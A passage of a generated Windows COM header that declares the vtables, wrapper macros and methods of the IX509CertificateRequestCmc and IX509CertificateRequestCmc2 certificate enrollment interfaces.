        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_KeyArchivalCertificate )( 
            __RPC__in IX509CertificateRequestCmc * This,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [custom][propput] */ HRESULT ( STDMETHODCALLTYPE *put_KeyArchivalCertificate )( 
            __RPC__in IX509CertificateRequestCmc * This,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR Value);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_EncryptionAlgorithm )( 
            __RPC__in IX509CertificateRequestCmc * This,
            /* [retval][out] */ __RPC__deref_out_opt IObjectId **ppValue);
        
        /* [custom][propput] */ HRESULT ( STDMETHODCALLTYPE *put_EncryptionAlgorithm )( 
            __RPC__in IX509CertificateRequestCmc * This,
            /* [in] */ __RPC__in_opt IObjectId *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_EncryptionStrength )( 
            __RPC__in IX509CertificateRequestCmc * This,
            /* [retval][out] */ __RPC__out LONG *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_EncryptionStrength )( 
            __RPC__in IX509CertificateRequestCmc * This,
            /* [in] */ LONG Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_EncryptedKeyHash )( 
            __RPC__in IX509CertificateRequestCmc * This,
            /* [in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_SignerCertificates )( 
            __RPC__in IX509CertificateRequestCmc * This,
            /* [retval][out] */ __RPC__deref_out_opt ISignerCertificates **ppValue);
        
        END_INTERFACE
    } IX509CertificateRequestCmcVtbl;

    interface IX509CertificateRequestCmc
    {
        CONST_VTBL struct IX509CertificateRequestCmcVtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define IX509CertificateRequestCmc_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define IX509CertificateRequestCmc_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define IX509CertificateRequestCmc_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define IX509CertificateRequestCmc_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define IX509CertificateRequestCmc_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define IX509CertificateRequestCmc_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define IX509CertificateRequestCmc_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define IX509CertificateRequestCmc_Initialize(This,Context)	\
    ( (This)->lpVtbl -> Initialize(This,Context) ) 

#define IX509CertificateRequestCmc_Encode(This)	\
    ( (This)->lpVtbl -> Encode(This) ) 

#define IX509CertificateRequestCmc_ResetForEncode(This)	\
    ( (This)->lpVtbl -> ResetForEncode(This) ) 

#define IX509CertificateRequestCmc_GetInnerRequest(This,Level,ppValue)	\
    ( (This)->lpVtbl -> GetInnerRequest(This,Level,ppValue) ) 

#define IX509CertificateRequestCmc_get_Type(This,pValue)	\
    ( (This)->lpVtbl -> get_Type(This,pValue) ) 

#define IX509CertificateRequestCmc_get_EnrollmentContext(This,pValue)	\
    ( (This)->lpVtbl -> get_EnrollmentContext(This,pValue) ) 

#define IX509CertificateRequestCmc_get_Silent(This,pValue)	\
    ( (This)->lpVtbl -> get_Silent(This,pValue) ) 

#define IX509CertificateRequestCmc_put_Silent(This,Value)	\
    ( (This)->lpVtbl -> put_Silent(This,Value) ) 

#define IX509CertificateRequestCmc_get_ParentWindow(This,pValue)	\
    ( (This)->lpVtbl -> get_ParentWindow(This,pValue) ) 

#define IX509CertificateRequestCmc_put_ParentWindow(This,Value)	\
    ( (This)->lpVtbl -> put_ParentWindow(This,Value) ) 

#define IX509CertificateRequestCmc_get_UIContextMessage(This,pValue)	\
    ( (This)->lpVtbl -> get_UIContextMessage(This,pValue) ) 

#define IX509CertificateRequestCmc_put_UIContextMessage(This,Value)	\
    ( (This)->lpVtbl -> put_UIContextMessage(This,Value) ) 

#define IX509CertificateRequestCmc_get_SuppressDefaults(This,pValue)	\
    ( (This)->lpVtbl -> get_SuppressDefaults(This,pValue) ) 

#define IX509CertificateRequestCmc_put_SuppressDefaults(This,Value)	\
    ( (This)->lpVtbl -> put_SuppressDefaults(This,Value) ) 

#define IX509CertificateRequestCmc_get_RenewalCertificate(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_RenewalCertificate(This,Encoding,pValue) ) 

#define IX509CertificateRequestCmc_put_RenewalCertificate(This,Encoding,Value)	\
    ( (This)->lpVtbl -> put_RenewalCertificate(This,Encoding,Value) ) 

#define IX509CertificateRequestCmc_get_ClientId(This,pValue)	\
    ( (This)->lpVtbl -> get_ClientId(This,pValue) ) 

#define IX509CertificateRequestCmc_put_ClientId(This,Value)	\
    ( (This)->lpVtbl -> put_ClientId(This,Value) ) 

#define IX509CertificateRequestCmc_get_CspInformations(This,ppValue)	\
    ( (This)->lpVtbl -> get_CspInformations(This,ppValue) ) 

#define IX509CertificateRequestCmc_put_CspInformations(This,pValue)	\
    ( (This)->lpVtbl -> put_CspInformations(This,pValue) ) 

#define IX509CertificateRequestCmc_get_HashAlgorithm(This,ppValue)	\
    ( (This)->lpVtbl -> get_HashAlgorithm(This,ppValue) ) 

#define IX509CertificateRequestCmc_put_HashAlgorithm(This,pValue)	\
    ( (This)->lpVtbl -> put_HashAlgorithm(This,pValue) ) 

#define IX509CertificateRequestCmc_get_AlternateSignatureAlgorithm(This,pValue)	\
    ( (This)->lpVtbl -> get_AlternateSignatureAlgorithm(This,pValue) ) 

#define IX509CertificateRequestCmc_put_AlternateSignatureAlgorithm(This,Value)	\
    ( (This)->lpVtbl -> put_AlternateSignatureAlgorithm(This,Value) ) 

#define IX509CertificateRequestCmc_get_RawData(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_RawData(This,Encoding,pValue) ) 


#define IX509CertificateRequestCmc_InitializeFromTemplateName(This,Context,strTemplateName)	\
    ( (This)->lpVtbl -> InitializeFromTemplateName(This,Context,strTemplateName) ) 

#define IX509CertificateRequestCmc_InitializeFromCertificate(This,Context,RenewalRequest,strCertificate,Encoding,InheritOptions)	\
    ( (This)->lpVtbl -> InitializeFromCertificate(This,Context,RenewalRequest,strCertificate,Encoding,InheritOptions) ) 

#define IX509CertificateRequestCmc_InitializeFromInnerRequest(This,pInnerRequest)	\
    ( (This)->lpVtbl -> InitializeFromInnerRequest(This,pInnerRequest) ) 

#define IX509CertificateRequestCmc_InitializeDecode(This,strEncodedData,Encoding)	\
    ( (This)->lpVtbl -> InitializeDecode(This,strEncodedData,Encoding) ) 

#define IX509CertificateRequestCmc_get_RequesterName(This,pValue)	\
    ( (This)->lpVtbl -> get_RequesterName(This,pValue) ) 

#define IX509CertificateRequestCmc_put_RequesterName(This,Value)	\
    ( (This)->lpVtbl -> put_RequesterName(This,Value) ) 

#define IX509CertificateRequestCmc_get_SignerCertificate(This,ppValue)	\
    ( (This)->lpVtbl -> get_SignerCertificate(This,ppValue) ) 

#define IX509CertificateRequestCmc_put_SignerCertificate(This,pValue)	\
    ( (This)->lpVtbl -> put_SignerCertificate(This,pValue) ) 


#define IX509CertificateRequestCmc_InitializeFromInnerRequestTemplateName(This,pInnerRequest,strTemplateName)	\
    ( (This)->lpVtbl -> InitializeFromInnerRequestTemplateName(This,pInnerRequest,strTemplateName) ) 

#define IX509CertificateRequestCmc_get_TemplateObjectId(This,ppValue)	\
    ( (This)->lpVtbl -> get_TemplateObjectId(This,ppValue) ) 

#define IX509CertificateRequestCmc_get_NullSigned(This,pValue)	\
    ( (This)->lpVtbl -> get_NullSigned(This,pValue) ) 

#define IX509CertificateRequestCmc_get_CryptAttributes(This,ppValue)	\
    ( (This)->lpVtbl -> get_CryptAttributes(This,ppValue) ) 

#define IX509CertificateRequestCmc_get_NameValuePairs(This,ppValue)	\
    ( (This)->lpVtbl -> get_NameValuePairs(This,ppValue) ) 

#define IX509CertificateRequestCmc_get_X509Extensions(This,ppValue)	\
    ( (This)->lpVtbl -> get_X509Extensions(This,ppValue) ) 

#define IX509CertificateRequestCmc_get_CriticalExtensions(This,ppValue)	\
    ( (This)->lpVtbl -> get_CriticalExtensions(This,ppValue) ) 

#define IX509CertificateRequestCmc_get_SuppressOids(This,ppValue)	\
    ( (This)->lpVtbl -> get_SuppressOids(This,ppValue) ) 

#define IX509CertificateRequestCmc_get_TransactionId(This,pValue)	\
    ( (This)->lpVtbl -> get_TransactionId(This,pValue) ) 

#define IX509CertificateRequestCmc_put_TransactionId(This,Value)	\
    ( (This)->lpVtbl -> put_TransactionId(This,Value) ) 

#define IX509CertificateRequestCmc_get_SenderNonce(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_SenderNonce(This,Encoding,pValue) ) 

#define IX509CertificateRequestCmc_put_SenderNonce(This,Encoding,Value)	\
    ( (This)->lpVtbl -> put_SenderNonce(This,Encoding,Value) ) 

#define IX509CertificateRequestCmc_get_SignatureInformation(This,ppValue)	\
    ( (This)->lpVtbl -> get_SignatureInformation(This,ppValue) ) 

#define IX509CertificateRequestCmc_get_ArchivePrivateKey(This,pValue)	\
    ( (This)->lpVtbl -> get_ArchivePrivateKey(This,pValue) ) 

#define IX509CertificateRequestCmc_put_ArchivePrivateKey(This,Value)	\
    ( (This)->lpVtbl -> put_ArchivePrivateKey(This,Value) ) 

#define IX509CertificateRequestCmc_get_KeyArchivalCertificate(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_KeyArchivalCertificate(This,Encoding,pValue) ) 

#define IX509CertificateRequestCmc_put_KeyArchivalCertificate(This,Encoding,Value)	\
    ( (This)->lpVtbl -> put_KeyArchivalCertificate(This,Encoding,Value) ) 

#define IX509CertificateRequestCmc_get_EncryptionAlgorithm(This,ppValue)	\
    ( (This)->lpVtbl -> get_EncryptionAlgorithm(This,ppValue) ) 

#define IX509CertificateRequestCmc_put_EncryptionAlgorithm(This,pValue)	\
    ( (This)->lpVtbl -> put_EncryptionAlgorithm(This,pValue) ) 

#define IX509CertificateRequestCmc_get_EncryptionStrength(This,pValue)	\
    ( (This)->lpVtbl -> get_EncryptionStrength(This,pValue) ) 

#define IX509CertificateRequestCmc_put_EncryptionStrength(This,Value)	\
    ( (This)->lpVtbl -> put_EncryptionStrength(This,Value) ) 

#define IX509CertificateRequestCmc_get_EncryptedKeyHash(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_EncryptedKeyHash(This,Encoding,pValue) ) 

#define IX509CertificateRequestCmc_get_SignerCertificates(This,ppValue)	\
    ( (This)->lpVtbl -> get_SignerCertificates(This,ppValue) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __IX509CertificateRequestCmc_INTERFACE_DEFINED__ */


#ifndef __IX509CertificateRequestCmc2_INTERFACE_DEFINED__
#define __IX509CertificateRequestCmc2_INTERFACE_DEFINED__

/* interface IX509CertificateRequestCmc2 */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_IX509CertificateRequestCmc2;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("728ab35d-217d-11da-b2a4-000e7bbb2b09")
    IX509CertificateRequestCmc2 : public IX509CertificateRequestCmc
    {
    public:
        virtual HRESULT STDMETHODCALLTYPE InitializeFromTemplate( 
            /* [in] */ X509CertificateEnrollmentContext context,
            /* [in] */ __RPC__in_opt IX509EnrollmentPolicyServer *pPolicyServer,
            /* [in] */ __RPC__in_opt IX509CertificateTemplate *pTemplate) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE InitializeFromInnerRequestTemplate( 
            /* [in] */ __RPC__in_opt IX509CertificateRequest *pInnerRequest,
            /* [in] */ __RPC__in_opt IX509EnrollmentPolicyServer *pPolicyServer,
            /* [in] */ __RPC__in_opt IX509CertificateTemplate *pTemplate) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_PolicyServer( 
            /* [retval][out] */ __RPC__deref_out_opt IX509EnrollmentPolicyServer **ppPolicyServer) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_Template( 
            /* [retval][out] */ __RPC__deref_out_opt IX509CertificateTemplate **ppTemplate) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE CheckSignature( 
            /* [defaultvalue][in] */ Pkcs10AllowedSignatureTypes AllowedSignatureTypes = AllowedKeySignature) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE CheckCertificateSignature( 
            /* [in] */ __RPC__in_opt ISignerCertificate *pSignerCertificate,
            /* [in] */ VARIANT_BOOL ValidateCertificateChain) = 0;
        
    };
    
#else 	/* C style interface */

    typedef struct IX509CertificateRequestCmc2Vtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in IX509CertificateRequestCmc2 * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            __RPC__deref_out  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in IX509CertificateRequestCmc2 * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in IX509CertificateRequestCmc2 * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in IX509CertificateRequestCmc2 * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in IX509CertificateRequestCmc2 * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in IX509CertificateRequestCmc2 * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            IX509CertificateRequestCmc2 * This,
            /* [in] */ DISPID dispIdMember,
            /* [in] */ REFIID riid,
            /* [in] */ LCID lcid,
            /* [in] */ WORD wFlags,
            /* [out][in] */ DISPPARAMS *pDispParams,
            /* [out] */ VARIANT *pVarResult,
            /* [out] */ EXCEPINFO *pExcepInfo,
            /* [out] */ UINT *puArgErr);
        
        HRESULT ( STDMETHODCALLTYPE *Initialize )( 
            __RPC__in IX509CertificateRequestCmc2 * This,
            /* [in] */ X509CertificateEnrollmentContext Context);
        
        HRESULT ( STDMETHODCALLTYPE *Encode )( 
            __RPC__in IX509CertificateRequestCmc2 * This);
        
        HRESULT ( STDMETHODCALLTYPE *ResetForEncode )( 
            __RPC__in IX509CertificateRequestCmc2 * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetInnerRequest )( 
            __RPC__in IX509CertificateRequestCmc2 * This,
            /* [in] */ InnerRequestLevel Level,
            /* [retval][out] */ __RPC__deref_out_opt IX509CertificateRequest **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Type )( 
            __RPC__in IX509CertificateRequestCmc2 * This,
            /* [retval][out] */ __RPC__out X509RequestType *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_EnrollmentContext )( 
            __RPC__in IX509CertificateRequestCmc2 * This,
            /* [retval][out] */ __RPC__out X509CertificateEnrollmentContext *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Silent )( 
            __RPC__in IX509CertificateRequestCmc2 * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_Silent )( 
            __RPC__in IX509CertificateRequestCmc2 * This,
            /* [in] */ VARIANT_BOOL Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_ParentWindow )( 
            __RPC__in IX509CertificateRequestCmc2 * This,
            /* [retval][out] */ __RPC__out LONG *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_ParentWindow )( 
            __RPC__in IX509CertificateRequestCmc2 * This,
            /* [in] */ LONG Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_UIContextMessage )( 
            __RPC__in IX509CertificateRequestCmc2 * This,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_UIContextMessage )( 
            __RPC__in IX509CertificateRequestCmc2 * This,
            /* [in] */ __RPC__in BSTR Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_SuppressDefaults )( 
            __RPC__in IX509CertificateRequestCmc2 * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_SuppressDefaults )( 
            __RPC__in IX509CertificateRequestCmc2 * This,
            /* [in] */ VARIANT_BOOL Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_RenewalCertificate )( 
            __RPC__in IX509CertificateRequestCmc2 * This,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_RenewalCertificate )( 
            __RPC__in IX509CertificateRequestCmc2 * This,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR Value);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_ClientId )( 
            __RPC__in IX509CertificateRequestCmc2 * This,
            /* [retval][out] */ __RPC__out RequestClientInfoClientId *pValue);
        
        /* [custom][propput] */ HRESULT ( STDMETHODCALLTYPE *put_ClientId )( 
            __RPC__in IX509CertificateRequestCmc2 * This,
            /* [in] */ RequestClientInfoClientId Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_CspInformations )( 
            __RPC__in IX509CertificateRequestCmc2 * This,
            /* [retval][out] */ __RPC__deref_out_opt ICspInformations **ppValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_CspInformations )( 
            __RPC__in IX509CertificateRequestCmc2 * This,
            /* [in] */ __RPC__in_opt ICspInformations *pValue);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_HashAlgorithm )( 
            __RPC__in IX509CertificateRequestCmc2 * This,
            /* [retval][out] */ __RPC__deref_out_opt IObjectId **ppValue);
        
        /* [custom][propput] */ HRESULT ( STDMETHODCALLTYPE *put_HashAlgorithm )( 
            __RPC__in IX509CertificateRequestCmc2 * This,
            /* [in] */ __RPC__in_opt IObjectId *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_AlternateSignatureAlgorithm )( 
            __RPC__in IX509CertificateRequestCmc2 * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_AlternateSignatureAlgorithm )( 
            __RPC__in IX509CertificateRequestCmc2 * This,
            /* [in] */ VARIANT_BOOL Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_RawData )( 
            __RPC__in IX509CertificateRequestCmc2 * This,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeFromTemplateName )( 
            __RPC__in IX509CertificateRequestCmc2 * This,
            /* [in] */ X509CertificateEnrollmentContext Context,
            /* [in] */ __RPC__in BSTR strTemplateName);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeFromCertificate )( 
            __RPC__in IX509CertificateRequestCmc2 * This,
            /* [in] */ X509CertificateEnrollmentContext Context,
            /* [in] */ VARIANT_BOOL RenewalRequest,
            /* [in] */ __RPC__in BSTR strCertificate,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [defaultvalue][in] */ X509RequestInheritOptions InheritOptions);
        
        /* [custom] */ HRESULT ( STDMETHODCALLTYPE *InitializeFromInnerRequest )( 
            __RPC__in IX509CertificateRequestCmc2 * This,
            /* [in] */ __RPC__in_opt IX509CertificateRequest *pInnerRequest);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeDecode )( 
            __RPC__in IX509CertificateRequestCmc2 * This,
            /* [in] */ __RPC__in BSTR strEncodedData,
            /* [defaultvalue][in] */ EncodingType Encoding);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_RequesterName )( 
            __RPC__in IX509CertificateRequestCmc2 * This,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [custom][propput] */ HRESULT ( STDMETHODCALLTYPE *put_RequesterName )( 
            __RPC__in IX509CertificateRequestCmc2 * This,
            /* [in] */ __RPC__in BSTR Value);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_SignerCertificate )( 
            __RPC__in IX509CertificateRequestCmc2 * This,
            /* [retval][out] */ __RPC__deref_out_opt ISignerCertificate **ppValue);
        
        /* [custom][propput] */ HRESULT ( STDMETHODCALLTYPE *put_SignerCertificate )( 
            __RPC__in IX509CertificateRequestCmc2 * This,
            /* [in] */ __RPC__in_opt ISignerCertificate *pValue);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeFromInnerRequestTemplateName )( 
            __RPC__in IX509CertificateRequestCmc2 * This,
            /* [in] */ __RPC__in_opt IX509CertificateRequest *pInnerRequest,
            /* [in] */ __RPC__in BSTR strTemplateName);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_TemplateObjectId )( 
            __RPC__in IX509CertificateRequestCmc2 * This,
            /* [retval][out] */ __RPC__deref_out_opt IObjectId **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_NullSigned )( 
            __RPC__in IX509CertificateRequestCmc2 * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_CryptAttributes )( 
            __RPC__in IX509CertificateRequestCmc2 * This,
            /* [retval][out] */ __RPC__deref_out_opt ICryptAttributes **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_NameValuePairs )( 
            __RPC__in IX509CertificateRequestCmc2 * This,
            /* [retval][out] */ __RPC__deref_out_opt IX509NameValuePairs **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_X509Extensions )( 
            __RPC__in IX509CertificateRequestCmc2 * This,
            /* [retval][out] */ __RPC__deref_out_opt IX509Extensions **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_CriticalExtensions )( 
            __RPC__in IX509CertificateRequestCmc2 * This,
            /* [retval][out] */ __RPC__deref_out_opt IObjectIds **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_SuppressOids )( 
            __RPC__in IX509CertificateRequestCmc2 * This,
            /* [retval][out] */ __RPC__deref_out_opt IObjectIds **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_TransactionId )( 
            __RPC__in IX509CertificateRequestCmc2 * This,
            /* [retval][out] */ __RPC__out LONG *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_TransactionId )( 
            __RPC__in IX509CertificateRequestCmc2 * This,
            /* [in] */ LONG Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_SenderNonce )( 
            __RPC__in IX509CertificateRequestCmc2 * This,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_SenderNonce )( 
            __RPC__in IX509CertificateRequestCmc2 * This,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_SignatureInformation )( 
            __RPC__in IX509CertificateRequestCmc2 * This,
            /* [retval][out] */ __RPC__deref_out_opt IX509SignatureInformation **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_ArchivePrivateKey )( 
            __RPC__in IX509CertificateRequestCmc2 * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_ArchivePrivateKey )( 
            __RPC__in IX509CertificateRequestCmc2 * This,
            /* [in] */ VARIANT_BOOL Value);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_KeyArchivalCertificate )( 
            __RPC__in IX509CertificateRequestCmc2 * This,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [custom][propput] */ HRESULT ( STDMETHODCALLTYPE *put_KeyArchivalCertificate )( 
            __RPC__in IX509CertificateRequestCmc2 * This,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR Value);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_EncryptionAlgorithm )( 
            __RPC__in IX509CertificateRequestCmc2 * This,
            /* [retval][out] */ __RPC__deref_out_opt IObjectId **ppValue);
        
        /* [custom][propput] */ HRESULT ( STDMETHODCALLTYPE *put_EncryptionAlgorithm )( 
            __RPC__in IX509CertificateRequestCmc2 * This,
            /* [in] */ __RPC__in_opt IObjectId *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_EncryptionStrength )( 
            __RPC__in IX509CertificateRequestCmc2 * This,
            /* [retval][out] */ __RPC__out LONG *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_EncryptionStrength )( 
            __RPC__in IX509CertificateRequestCmc2 * This,
            /* [in] */ LONG Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_EncryptedKeyHash )( 
            __RPC__in IX509CertificateRequestCmc2 * This,
            /* [in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_SignerCertificates )( 
            __RPC__in IX509CertificateRequestCmc2 * This,
            /* [retval][out] */ __RPC__deref_out_opt ISignerCertificates **ppValue);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeFromTemplate )( 
            __RPC__in IX509CertificateRequestCmc2 * This,
            /* [in] */ X509CertificateEnrollmentContext context,
            /* [in] */ __RPC__in_opt IX509EnrollmentPolicyServer *pPolicyServer,
            /* [in] */ __RPC__in_opt IX509CertificateTemplate *pTemplate);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeFromInnerRequestTemplate )( 
            __RPC__in IX509CertificateRequestCmc2 * This,
            /* [in] */ __RPC__in_opt IX509CertificateRequest *pInnerRequest,
            /* [in] */ __RPC__in_opt IX509EnrollmentPolicyServer *pPolicyServer,
            /* [in] */ __RPC__in_opt IX509CertificateTemplate *pTemplate);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_PolicyServer )( 
            __RPC__in IX509CertificateRequestCmc2 * This,
            /* [retval][out] */ __RPC__deref_out_opt IX509EnrollmentPolicyServer **ppPolicyServer);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Template )( 
            __RPC__in IX509CertificateRequestCmc2 * This,
            /* [retval][out] */ __RPC__deref_out_opt IX509CertificateTemplate **ppTemplate);
        
        HRESULT ( STDMETHODCALLTYPE *CheckSignature )( 
            __RPC__in IX509CertificateRequestCmc2 * This,
            /* [defaultvalue][in] */ Pkcs10AllowedSignatureTypes AllowedSignatureTypes);
        
        HRESULT ( STDMETHODCALLTYPE *CheckCertificateSignature )( 
            __RPC__in IX509CertificateRequestCmc2 * This,
            /* [in] */ __RPC__in_opt ISignerCertificate *pSignerCertificate,
            /* [in] */ VARIANT_BOOL ValidateCertificateChain);
        
        END_INTERFACE
    } IX509CertificateRequestCmc2Vtbl;

    interface IX509CertificateRequestCmc2
    {
        CONST_VTBL struct IX509CertificateRequestCmc2Vtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define IX509CertificateRequestCmc2_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define IX509CertificateRequestCmc2_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define IX509CertificateRequestCmc2_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define IX509CertificateRequestCmc2_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define IX509CertificateRequestCmc2_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define IX509CertificateRequestCmc2_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
